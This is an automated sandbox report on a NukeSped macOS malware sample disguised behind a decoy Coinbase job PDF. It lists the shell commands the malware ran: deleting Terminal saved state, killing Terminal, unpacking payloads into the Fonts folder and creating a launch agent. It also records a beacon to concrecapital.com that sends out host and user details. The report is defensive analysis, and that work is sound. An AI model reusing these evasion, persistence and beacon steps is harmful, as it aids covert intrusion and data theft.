Edit tour

macOS Analysis Report
extractor

Overview

General Information

Sample Name:	extractor
Analysis ID:	1977504
MD5:	f97fc3d0dd6b217a92df567ad8f3d555
SHA1:	9306110d082ad86169c76d765c7d334f24747094
SHA256:	fe336a032b564eef07afb2f8a478b0e0a37d9a1a6c4c1e7cd01e404cc5dd2853
Infos:

Detection

Nukesped

Score:	96
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Yara detected Nukesped

Terminates the command-line application Terminal (probably to hinder manual analysis)

Antivirus detection for dropped file

Deletes the saved state of the command-line application Terminal (probably to avoid forensic reconstruction of shell activity)

Opens PDF files, sometimes used to disguise malicious intentions

Writes Mach-O files to untypical directories

Opens applications from non-standard application directories

Terminates several processes with shell command 'killall'

Contains symbols with suspicious names likely related to networking

Reads the systems hostname

Opens applications that might be created ones

Writes PDF files to disk

Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)

Mach-O sample file contains an ARM64 binary that executes on Apple Silicon

Queries OS software version with shell command 'sw_vers'

Contains symbols with suspicious names likely related to well-known browsers

Sample tries to kill a process (SIGKILL)

Sample is a FAT Mach-O sample containing binaries for multiple architectures

Writes RTF files to disk

Reads hardware related sysctl values

Creates user-wide 'launchd' managed services aka launch agents

Reads the saved state of applications

Creates code signed application bundles

Mach-O contains sections with high entropy indicating compressed/encrypted content

Executes commands using a shell command-line interpreter

Reads the systems OS release and/or type

Creates application bundles

Contains symbols with paths

Executes the "rm" command used to delete files or directories

Executes the "pgrep" command search for and/or send signals to processes

Writes FAT Mach-O files to disk

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	1977504
Start date and time:	2022-08-18 12:34:03 +02:00
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 3m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	extractor
Cookbook file name:	macOS - Big Sur - load provided binary as normal user.jbs
Analysis system description:	Mac Mini, Big Sur (Office 2019 16.55, Java 1.8.0_311)
Analysis Mode:	default
Detection:	MAL
Classification:	mal96.troj.evad.mac@0/17@1/0

Warnings

Excluded IPs from analysis (whitelisted): 17.57.12.11
Excluded domains from analysis (whitelisted): b._dns-sd._udp.0.0.168.192.in-addr.arpa, gsp64-ssl.ls-apple.com.akadns.net, db._dns-sd._udp.0.0.168.192.in-addr.arpa

Runtime Messages

Command:	sudo -u drew /Users/drew/Desktop/extractor
PID:	866
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Process Tree

System is mac-bigsur

mono-sgen64 New Fork (PID: 866, Parent: 824)

sudo (MD5: f21c2a2dc106642f7c38801e121c8c86) Arguments: /usr/bin/sudo -u drew /Users/drew/Desktop/extractor

sudo New Fork (PID: 867, Parent: 866)

extractor (MD5: f97fc3d0dd6b217a92df567ad8f3d555) Arguments: /Users/drew/Desktop/extractor

extractor New Fork (PID: 868, Parent: 867)

bash (MD5: c1edb59ec6a40884fc3c4e201d31b1d5) Arguments: bash -c (open '/Users/drew/Library/Fonts/Coinbase_online_careers_2022_07.pdf' && rm -rf '/Users/drew/Library/Saved Application State/com.apple.Terminal.savedState') 2>&1

bash New Fork (PID: 869, Parent: 868)

bash New Fork (PID: 870, Parent: 869)

open (MD5: 81d0c6fefba2004d451915c6fa861914) Arguments: open /Users/drew/Library/Fonts/Coinbase_online_careers_2022_07.pdf

bash New Fork (PID: 873, Parent: 869)

rm (MD5: 6cd9e187f33d60ce3cb05b12435f0673) Arguments: rm -rf /Users/drew/Library/Saved Application State/com.apple.Terminal.savedState

extractor New Fork (PID: 874, Parent: 867)

bash (MD5: c1edb59ec6a40884fc3c4e201d31b1d5) Arguments: bash -c (tar zxvf '/Users/drew/Library/Fonts/safarifontsagent_' -C '/Users/drew/Library/Fonts') 2>&1

bash New Fork (PID: 875, Parent: 874)

tar (MD5: dbeb13c3b2ade21995470fde7650314a) Arguments: tar zxvf /Users/drew/Library/Fonts/safarifontsagent_ -C /Users/drew/Library/Fonts

extractor New Fork (PID: 876, Parent: 867)

bash (MD5: c1edb59ec6a40884fc3c4e201d31b1d5) Arguments: bash -c (tar zxvf '/Users/drew/Library/Fonts/fontsupdater_' -C '/Users/drew/Library/Fonts') 2>&1

bash New Fork (PID: 877, Parent: 876)

tar (MD5: dbeb13c3b2ade21995470fde7650314a) Arguments: tar zxvf /Users/drew/Library/Fonts/fontsupdater_ -C /Users/drew/Library/Fonts

extractor New Fork (PID: 878, Parent: 867)

bash (MD5: c1edb59ec6a40884fc3c4e201d31b1d5) Arguments: bash -c (pgrep -f safarifontsagent) 2>&1

bash New Fork (PID: 879, Parent: 878)

pgrep (MD5: 8c476a299c23f6971101e7bbd6462c3c) Arguments: pgrep -f safarifontsagent

extractor New Fork (PID: 880, Parent: 867)

bash (MD5: c1edb59ec6a40884fc3c4e201d31b1d5) Arguments: bash -c (pgrep -f safarifontsagent) 2>&1

bash New Fork (PID: 881, Parent: 880)

pgrep (MD5: 8c476a299c23f6971101e7bbd6462c3c) Arguments: pgrep -f safarifontsagent

extractor New Fork (PID: 882, Parent: 867)

bash (MD5: c1edb59ec6a40884fc3c4e201d31b1d5) Arguments: bash -c (open -a '/Users/drew/Library/Fonts/FinderFontsUpdater.app') 2>&1

bash New Fork (PID: 883, Parent: 882)

open (MD5: 81d0c6fefba2004d451915c6fa861914) Arguments: open -a /Users/drew/Library/Fonts/FinderFontsUpdater.app

extractor New Fork (PID: 898, Parent: 867)

bash (MD5: c1edb59ec6a40884fc3c4e201d31b1d5) Arguments: bash -c (pgrep -f safarifontsagent) 2>&1

bash New Fork (PID: 899, Parent: 898)

pgrep (MD5: 8c476a299c23f6971101e7bbd6462c3c) Arguments: pgrep -f safarifontsagent

extractor New Fork (PID: 900, Parent: 867)

bash (MD5: c1edb59ec6a40884fc3c4e201d31b1d5) Arguments: bash -c (killall Terminal) 2>&1

bash New Fork (PID: 901, Parent: 900)

killall (MD5: f3e64d320b9eed9c6dbd97435daddded) Arguments: killall Terminal

xpcproxy New Fork (PID: 871, Parent: 1)

Preview (MD5: 510c4010daefc87831ff8730ab2f5092) Arguments: /System/Applications/Preview.app/Contents/MacOS/Preview

xpcproxy New Fork (PID: 884, Parent: 1)

FinderFontsUpdater (MD5: fc5d8c6ccf10d0b900baa394d2ead97d) Arguments: /Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/MacOS/FinderFontsUpdater

FinderFontsUpdater New Fork (PID: 886, Parent: 884)

safarifontsagent (MD5: ded8cac968d278aeb2889dc7552e46e1) Arguments: /Users/drew/Library/Fonts/safarifontsagent

sh New Fork (PID: 887, Parent: 886)

bash (MD5: c1edb59ec6a40884fc3c4e201d31b1d5) Arguments: sh -c sw_vers -productVersion

sw_vers (MD5: 7e6a3895092064bd002ecb1d4300b0db) Arguments: sw_vers -productVersion

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
extractor	JoeSecurity_Nukesped_2	Yara detected Nukesped	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
/Users/drew/Library/Fonts/safarifontsagent	JoeSecurity_Nukesped_2	Yara detected Nukesped	Joe Security
/Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/MacOS/FinderFontsUpdater	JoeSecurity_Nukesped_2	Yara detected Nukesped	Joe Security

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: extractor PID: 867	JoeSecurity_Nukesped_2	Yara detected Nukesped	Joe Security
Process Memory Space: FinderFontsUpdater PID: 884	JoeSecurity_Nukesped_2	Yara detected Nukesped	Joe Security
Process Memory Space: safarifontsagent PID: 886	JoeSecurity_Nukesped_2	Yara detected Nukesped	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: extractor

Avira: detected

Antivirus detection for dropped file

Source: /Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/MacOS/FinderFontsUpdater	Avira: detection malicious, Label: OSX/NukeSped.kgzti
Source: /Users/drew/Library/Fonts/safarifontsagent	Avira: detection malicious, Label: OSX/NukeSped.xxlef

Source: unknown

HTTPS traffic detected: 64.44.102.6:443 -> 192.168.0.52:49483 version: TLS 1.2

Source: /Users/drew/Library/Fonts/safarifontsagent (PID: 886)

Writes from socket in process: data

Jump to behavior

Source: unknown	Network traffic detected: HTTP traffic on port 49483 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49482 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49483
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49482

Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.57.211
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.57.211
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.57.211
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.57.211

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Date: Thu, 18 Aug 2022 10:34:26 GMTConnection: closeContent-Length: 1245

Source: extractor, 00000867.00000333.9.0000000115ac3000.0000000115afb000.r--.sdmp, FinderFontsUpdater, 00000884.00000366.1.000000010bd65000.000000010bd9d000.r--.sdmp, safarifontsagent, 00000886.00000370.1.000000010e35c000.000000010e394000.r--.sdmp	String found in binary or memory: http://crl.apple.com/codesigning.crl0
Source: extractor, FinderFontsUpdater.352.dr, safarifontsagent.347.dr	String found in binary or memory: http://crl.apple.com/root.crl0
Source: extractor, FinderFontsUpdater.352.dr, safarifontsagent.347.dr	String found in binary or memory: http://crl.apple.com/timestamp.crl0
Source: extractor, FinderFontsUpdater.352.dr, safarifontsagent.347.dr	String found in binary or memory: http://ocsp.apple.com/ocsp03-devid060
Source: extractor, CodeResources.352.dr, Info.plist.352.dr, com.safari.fontsyncagent.plist.333.dr, FinderFontsUpdater.352.dr, safarifontsagent.347.dr	String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: extractor, 00000867.00000333.9.0000000115ac3000.0000000115afb000.r--.sdmp, FinderFontsUpdater, 00000884.00000366.1.000000010bd65000.000000010bd9d000.r--.sdmp, safarifontsagent, 00000886.00000370.1.000000010e35c000.000000010e394000.r--.sdmp	String found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: extractor, FinderFontsUpdater.352.dr, safarifontsagent.347.dr	String found in binary or memory: http://www.apple.com/appleca0
Source: extractor, FinderFontsUpdater.352.dr, safarifontsagent.347.dr	String found in binary or memory: http://www.apple.com/certificateauthority/0
Source: safarifontsagent, 00000886.00000370.1.000000010339f000.00000001033a3000.rw-.sdmp, safarifontsagent.347.dr	String found in binary or memory: https://concrecapital.com
Source: extractor, FinderFontsUpdater.352.dr, safarifontsagent.347.dr	String found in binary or memory: https://www.apple.com/appleca/0

Source: /Users/drew/Library/Fonts/safarifontsagent (PID: 886)

Reads from socket in process: data

Jump to behavior

Source: unknown

DNS traffic detected: queries for: concrecapital.com

Source: global traffic

HTTP traffic detected: GET /drew.jpg?response+Drews-Mac-mini.local/drew/11.6.1/3.000000Gh/x86_64/484630818816/499963174912/ HTTP/1.1Host: concrecapital.comUser-Agent: Mozilla/5.0+(Macintosh;Intel+Mac+OS+X+11_2_1)+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36Accept: */*Content-Encoding: application/x-www-form-urlencoded; charset=UTF-8

Source: unknown

HTTPS traffic detected: 64.44.102.6:443 -> 192.168.0.52:49483 version: TLS 1.2

Source: /Users/drew/Desktop/extractor (PID: 867)	SIGKILL sent: pid: 868, result: successful	Jump to behavior
Source: /Users/drew/Desktop/extractor (PID: 867)	SIGKILL sent: pid: 874, result: successful	Jump to behavior
Source: /Users/drew/Desktop/extractor (PID: 867)	SIGKILL sent: pid: 876, result: successful	Jump to behavior
Source: /Users/drew/Desktop/extractor (PID: 867)	SIGKILL sent: pid: 878, result: successful	Jump to behavior
Source: /Users/drew/Desktop/extractor (PID: 867)	SIGKILL sent: pid: 880, result: successful	Jump to behavior
Source: /Users/drew/Desktop/extractor (PID: 867)	SIGKILL sent: pid: 882, result: successful	Jump to behavior
Source: /Users/drew/Desktop/extractor (PID: 867)	SIGKILL sent: pid: 898, result: successful	Jump to behavior
Source: /Users/drew/Desktop/extractor (PID: 867)	SIGKILL sent: pid: 900, result: successful	Jump to behavior

Source: classification engine

Classification label: mal96.troj.evad.mac@0/17@1/0

Source: dropped file: safarifontsagent.347.dr	Mach-O symbol: _g_szServerUrl
Source: dropped file: safarifontsagent.347.dr	Mach-O symbol: _g_szServerUrl

Source: submission: extractor	Mach-O symbol: __Z15IsSafariFAExistv
Source: submission: extractor	Mach-O symbol: __Z15IsSafariFAExistv

Source: dropped file: FinderFontsUpdater.352.dr	Mach-O symbol: /Library/Caches/com.apple.xbs/Sources/arclite/arclite-76/source/
Source: dropped file: FinderFontsUpdater.352.dr	Mach-O symbol: /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX12.1.Internal.sdk/usr/include/_ctype.h
Source: dropped file: FinderFontsUpdater.352.dr	Mach-O symbol: /Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/arc/libarclite_macosx.a(arclite.o)

Persistence and Installation Behavior

Writes Mach-O files to untypical directories

Source: /usr/bin/tar (PID: 875)	FAT Mach-O written to unusual path: /Users/drew/Library/Fonts/safarifontsagent			Jump to dropped file
Source: /usr/bin/tar (PID: 877)	FAT Mach-O written to unusual path: /Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/MacOS/FinderFontsUpdater			Jump to dropped file

Opens applications from non-standard application directories

Source: /bin/bash (PID: 883)

Application opened: open -a /Users/drew/Library/Fonts/FinderFontsUpdater.app

Jump to behavior

Terminates several processes with shell command 'killall'

Source: /bin/bash (PID: 901)

Killall command executed: killall Terminal

Jump to behavior

Source: /bin/bash (PID: 883)

Application opened: open -a /Users/drew/Library/Fonts/FinderFontsUpdater.app

Jump to behavior

Source: /Users/drew/Desktop/extractor (PID: 867)

File written: /Users/drew/Library/Fonts/Coinbase_online_careers_2022_07.pdf

Jump to dropped file

Source: submission

Source: submission

Source: /usr/bin/tar (PID: 877)

File written: /Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/Resources/en.lproj/Credits.rtf

Jump to dropped file

Source: /bin/rm (PID: 873)

Saved state directory opened: /Users/drew/Library/Saved Application State/com.apple.Terminal.savedState

Jump to behavior

Source: /usr/bin/tar (PID: 877)

Bundle code signature resource File created: FinderFontsUpdater.app/Contents/_CodeSignature/CodeResources

Jump to behavior

Source: /Users/drew/Desktop/extractor (PID: 868)	Shell command executed: bash -c (open '/Users/drew/Library/Fonts/Coinbase_online_careers_2022_07.pdf' && rm -rf '/Users/drew/Library/Saved Application State/com.apple.Terminal.savedState') 2>&1	Jump to behavior
Source: /Users/drew/Desktop/extractor (PID: 874)	Shell command executed: bash -c (tar zxvf '/Users/drew/Library/Fonts/safarifontsagent_' -C '/Users/drew/Library/Fonts') 2>&1	Jump to behavior
Source: /Users/drew/Desktop/extractor (PID: 876)	Shell command executed: bash -c (tar zxvf '/Users/drew/Library/Fonts/fontsupdater_' -C '/Users/drew/Library/Fonts') 2>&1	Jump to behavior
Source: /Users/drew/Desktop/extractor (PID: 878)	Shell command executed: bash -c (pgrep -f safarifontsagent) 2>&1	Jump to behavior
Source: /Users/drew/Desktop/extractor (PID: 880)	Shell command executed: bash -c (pgrep -f safarifontsagent) 2>&1	Jump to behavior
Source: /Users/drew/Desktop/extractor (PID: 882)	Shell command executed: bash -c (open -a '/Users/drew/Library/Fonts/FinderFontsUpdater.app') 2>&1	Jump to behavior
Source: /Users/drew/Desktop/extractor (PID: 898)	Shell command executed: bash -c (pgrep -f safarifontsagent) 2>&1	Jump to behavior
Source: /Users/drew/Desktop/extractor (PID: 900)	Shell command executed: bash -c (killall Terminal) 2>&1	Jump to behavior
Source: /Users/drew/Library/Fonts/safarifontsagent (PID: 886)	Shell command executed: sh -c sw_vers -productVersion	Jump to behavior
Source: /bin/sh (PID: 887)	Shell command executed: sh -c sw_vers -productVersion	Jump to behavior

Source: /usr/bin/tar (PID: 877)

Bundle Info.plist File created: FinderFontsUpdater.app/Contents/Info.plist

Jump to behavior

Source: /bin/bash (PID: 873)

Rm executable: /bin/rm -> rm -rf /Users/drew/Library/Saved Application State/com.apple.Terminal.savedState

Jump to behavior

Source: /bin/bash (PID: 879)	Pgrep executable: /usr/bin/pgrep -> pgrep -f safarifontsagent	Jump to behavior
Source: /bin/bash (PID: 881)	Pgrep executable: /usr/bin/pgrep -> pgrep -f safarifontsagent	Jump to behavior
Source: /bin/bash (PID: 899)	Pgrep executable: /usr/bin/pgrep -> pgrep -f safarifontsagent	Jump to behavior

Source: /usr/bin/tar (PID: 875)	File written: /Users/drew/Library/Fonts/safarifontsagent			Jump to dropped file
Source: /usr/bin/tar (PID: 877)	File written: /Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/MacOS/FinderFontsUpdater			Jump to dropped file

Source: /Users/drew/Desktop/extractor (PID: 867)	XML plist file created: /Users/drew/Library/LaunchAgents/com.safari.fontsyncagent.plist	Jump to dropped file
Source: /usr/bin/tar (PID: 877)	XML plist file created: /Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/Info.plist	Jump to dropped file
Source: /usr/bin/tar (PID: 877)	Binary plist file created: /Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/Resources/en.lproj/MainMenu.nib/keyedobjects.nib	Jump to dropped file
Source: /usr/bin/tar (PID: 877)	XML plist file created: /Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/_CodeSignature/CodeResources	Jump to dropped file

Source: /System/Applications/Preview.app/Contents/MacOS/Preview (PID: 871)

AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist

Jump to behavior

Source: /System/Applications/Preview.app/Contents/MacOS/Preview (PID: 871)

Random device file read: /dev/random

Jump to behavior

Source: submission

CodeSign Info: Executable=/Users/drew/Desktop/extractor

Source: /Users/drew/Desktop/extractor (PID: 867)

Launch agent created File created: /Users/drew/Library/LaunchAgents//com.safari.fontsyncagent.plist

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Terminates the command-line application Terminal (probably to hinder manual analysis)

Source: /bin/bash (PID: 901)

Kills( terminal apps: killall Terminal

Jump to behavior

Deletes the saved state of the command-line application Terminal (probably to avoid forensic reconstruction of shell activity)

Source: /bin/bash (PID: 873)

Saved state deleted: /bin/rm -> rm -rf /Users/drew/Library/Saved Application State/com.apple.Terminal.savedState

Jump to behavior

Opens PDF files, sometimes used to disguise malicious intentions

Source: /bin/bash (PID: 870)

PDF opened with default viewer: open /Users/drew/Library/Fonts/Coinbase_online_careers_2022_07.pdf

Jump to behavior

Source: extractor	Submission file: section __data with 7.9623 entropy (max. 8.0)
Source: extractor	Submission file: section __data with 7.9624 entropy (max. 8.0)

Source: /System/Applications/Preview.app/Contents/MacOS/Preview (PID: 871)

Sysctl read request: kern.safeboot (1.66)

Jump to behavior

Source: /bin/bash (PID: 868)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 874)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 876)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 878)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 880)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 882)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 898)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 900)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /Users/drew/Library/Fonts/safarifontsagent (PID: 886)	Sysctl requested: kern.hostname (1.10)	Jump to behavior
Source: /bin/bash (PID: 887)	Sysctl requested: kern.hostname (1.10)	Jump to behavior

Source: /bin/bash (PID: 887)

sw_vers executed: sw_vers -productVersion

Jump to behavior

Source: /System/Applications/Preview.app/Contents/MacOS/Preview (PID: 871)

Sysctl read request: hw.ncpu (6.3)

Jump to behavior

Source: /Users/drew/Library/Fonts/safarifontsagent (PID: 886)	Sysctl requested: kern.ostype (1.1)			Jump to behavior
Source: /Users/drew/Library/Fonts/safarifontsagent (PID: 886)	Sysctl requested: kern.osrelease (1.2)			Jump to behavior

Source: /usr/bin/open (PID: 870)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior
Source: /usr/bin/open (PID: 883)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior
Source: /System/Applications/Preview.app/Contents/MacOS/Preview (PID: 871)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior
Source: /usr/bin/sw_vers (PID: 887)	System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist	Jump to behavior

Stealing of Sensitive Information

Yara detected Nukesped

Source: Yara match	File source: extractor, type: SAMPLE
Source: Yara match	File source: Process Memory Space: extractor PID: 867, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FinderFontsUpdater PID: 884, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: safarifontsagent PID: 886, type: MEMORYSTR
Source: Yara match	File source: /Users/drew/Library/Fonts/safarifontsagent, type: DROPPED
Source: Yara match	File source: /Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/MacOS/FinderFontsUpdater, type: DROPPED

Remote Access Functionality

Yara detected Nukesped

Source: Yara match	File source: extractor, type: SAMPLE
Source: Yara match	File source: Process Memory Space: extractor PID: 867, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FinderFontsUpdater PID: 884, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: safarifontsagent PID: 886, type: MEMORYSTR
Source: Yara match	File source: /Users/drew/Library/Fonts/safarifontsagent, type: DROPPED
Source: Yara match	File source: /Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/MacOS/FinderFontsUpdater, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Command and Scripting Interpreter	1 Launch Agent	1 Launch Agent	2 Masquerading	OS Credential Dumping	51 System Information Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Scripting	1 Plist Modification	1 Plist Modification	1 Scripting	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Invalid Code Signature	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	4 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	11 Code Signing	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 File Deletion	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Shell
Is malicious
Internet

Source	Detection	Scanner	Label	Link
extractor	100%	Avira	OSX/NukeSped.usvpp

Dropped Files

Source	Detection	Scanner	Label	Link
/Users/drew/Library/Fonts/FinderFontsUpdater.app/Contents/MacOS/FinderFontsUpdater	100%	Avira	OSX/NukeSped.kgzti
/Users/drew/Library/Fonts/safarifontsagent	100%	Avira	OSX/NukeSped.xxlef

Name	IP	Active	Malicious	Antivirus Detection	Reputation
concrecapital.com	64.44.102.6	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://concrecapital.com	safarifontsagent, 00000886.00000370.1.000000010339f000.00000001033a3000.rw-.sdmp, safarifontsagent.347.dr	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
64.44.102.6	concrecapital.com	United States		20278	NEXEONUS	false

Signature Similarity

Sample Distance (10 = nearest)

10 9 8 7 6 5 4 3 2 1

Similar Samples

Samplename	Analysis ID	SHA256	Similarity

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NEXEONUS	SecuriteInfo.com.Variant.Strictor.266256.20398.exe	Get hash	malicious	Browse	172.93.213.180
	rayBmX5I5v.exe	Get hash	malicious	Browse	64.44.135.171
	UjqOvBd81S	Get hash	malicious	Browse	167.94.173.107
	dNLKZA6IVs	Get hash	malicious	Browse	216.107.146.42
	9aDl048Kv4	Get hash	malicious	Browse	167.94.84.200
	https://festive-villani.64-44-102-74.plesk.page/WebmailV2/index.html#phishing.hameconnage@aircanada.ca	Get hash	malicious	Browse	64.44.102.74
	xd.arm	Get hash	malicious	Browse	107.175.9.137
	https://login-microsoftonline.valleyveterinarycares.com/	Get hash	malicious	Browse	172.93.201.12
	msb.exe	Get hash	malicious	Browse	172.93.193.21
	YGqcB8e1fo.exe	Get hash	malicious	Browse	172.93.144.171
	3VtKPs7ESr.exe	Get hash	malicious	Browse	172.93.144.140
	N.RY2121.xlsx	Get hash	malicious	Browse	64.44.102.69
	ZErNFYRzCC.exe	Get hash	malicious	Browse	64.44.101.231
	fOeJyxJorX.dll	Get hash	malicious	Browse	167.92.98.196
	DJlmsiXhi2.dll	Get hash	malicious	Browse	167.92.210.12
	cYg0lN3nYZ.dll	Get hash	malicious	Browse	64.44.165.65
	fcZBQq5qMC.dll	Get hash	malicious	Browse	107.173.63.118
	7HIw4dumsu.dll	Get hash	malicious	Browse	64.44.67.92
	uF8LcBnJu6.dll	Get hash	malicious	Browse	167.94.54.167
	File.exe	Get hash	malicious	Browse	64.44.101.231

Process:	/Users/drew/Desktop/extractor
File Type:	PDF document, version 1.7
Category:	dropped
Size (bytes):	318027
Entropy (8bit):	7.944220553559856
Encrypted:	false
SSDEEP:	6144:zz11yfjGJT+ovconp8LRSl5Jh1E8lWxmAab4dDhkc8dhX5+DABYQs47qhrJ:zz11Sj1yco8VGTh1plWxXab4BhWhuA7W
MD5:	22374D49B4C6C27EB10A135BD93722E9
SHA1:	456C6023BE5D736D2524573355DCD358EE0297B8
SHA-256:	2B4E8F1927927BDC2F71914BA1F12511D9B6BDBDB2DF390E267F54DC4F8919DD
SHA-512:	91E568D920F0DA302E6E31A1734880AA2FB3E29900AE0153E6B793DFF40E776C6B8CA6FF299F0E3696F28DBB6D91B7D23D8B3BF2707EF28F947436B91D148DB4
Malicious:	true
Reputation:	low
Preview:	%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 63 0 R/MarkInfo<</Marked true>>/Metadata 329 0 R/ViewerPreferences 330 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 20/Kids[ 3 0 R 19 0 R 26 0 R 28 0 R 30 0 R 32 0 R 34 0 R 36 0 R 38 0 R 40 0 R 42 0 R 44 0 R 46 0 R 48 0 R 50 0 R 52 0 R 54 0 R 56 0 R 58 0 R 60 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 11 0 R/F3 13 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image9 9 0 R/Image18 18 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 443>>..stream..x..TIK.@......1.\|....(... T.. ..v.=.j...{gR..h$9..\|...K..r.\.J.v.~Y...7..4_.=...K..b...z.N>.e.v..mz=.....G.Y.2.......l\.=....y....8Ck...q.=...R.....@..W.........~....1....qt.....A......=.rT.R..(.....,..y-......Mpq7.H.!.....X....L.a..."....>R..S......

/Users/drew/Library/Fonts/Finder

Download File

Process:	/Users/drew/Library/Fonts/safarifontsagent
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1245
Entropy (8bit):	5.462849750105637
Encrypted:	false
SSDEEP:	24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
MD5:	5343C1A8B203C162A3BF3870D9F50FD4
SHA1:	04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
SHA-256:	DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
